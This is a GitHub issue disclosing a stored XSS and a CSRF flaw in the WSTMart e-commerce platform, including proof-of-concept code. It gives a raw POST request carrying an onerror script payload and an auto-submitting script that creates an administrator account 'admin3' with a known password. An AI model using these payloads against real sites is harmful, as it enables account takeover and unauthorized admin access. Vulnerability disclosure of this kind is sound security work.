Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users #1

Open
denyorallow opened this issue Dec 22, 2018 · 0 comments
Open

There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users #1

denyorallow opened this issue Dec 22, 2018 · 0 comments

Comments

@denyorallow
Copy link

Shang tao software WSTMart e-commerce system is a based on THINKPHP framework 5.1 build B2B2C electric business platform, is now open source shopping system based on THINKPHP 5 is the most perfect, with PC, mobile phone WAP, micro mall, android APP, the APP, WeChat applet, six side one, six side each other, have nowadays one of the most popular level 3 distribution and function of micro bargaining, very suitable for enterprise and individual fast online business platform.

The code of the system is clear and easy to understand, a large number of visual reports are convenient for operators to make decisions, rich marketing functions make the application scenarios of the system broad, good plug-in mechanism makes the system more easy to expand. System operation is simple, safe and stable, update iteration is fast, is the majority of users direct use and secondary development of the best choice.

Official address: http://www.wstmart.net

0x01 stored XSS
Function point: mall some commodity details - commodity consultation
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454

goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E

0x02 CSRF

18/5000
Function point: background management - staff management - login account
poc:
1234.html

<title>Document</title> <script type="text/javascript"> test.staffId.value="0"; test.loginName.value="admin3"; test.staffPhoto.value=""; test.loginPwd.value="admin3"; test.staffName.value="admin3"; test.staffNo.value=""; test.RoleId.value="0"; test.staffPhone.value=""; test.wxOpenId.value=""; test.workStatus.value="1"; test.staffStatus.value="1"; test.submit(); </script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@denyorallow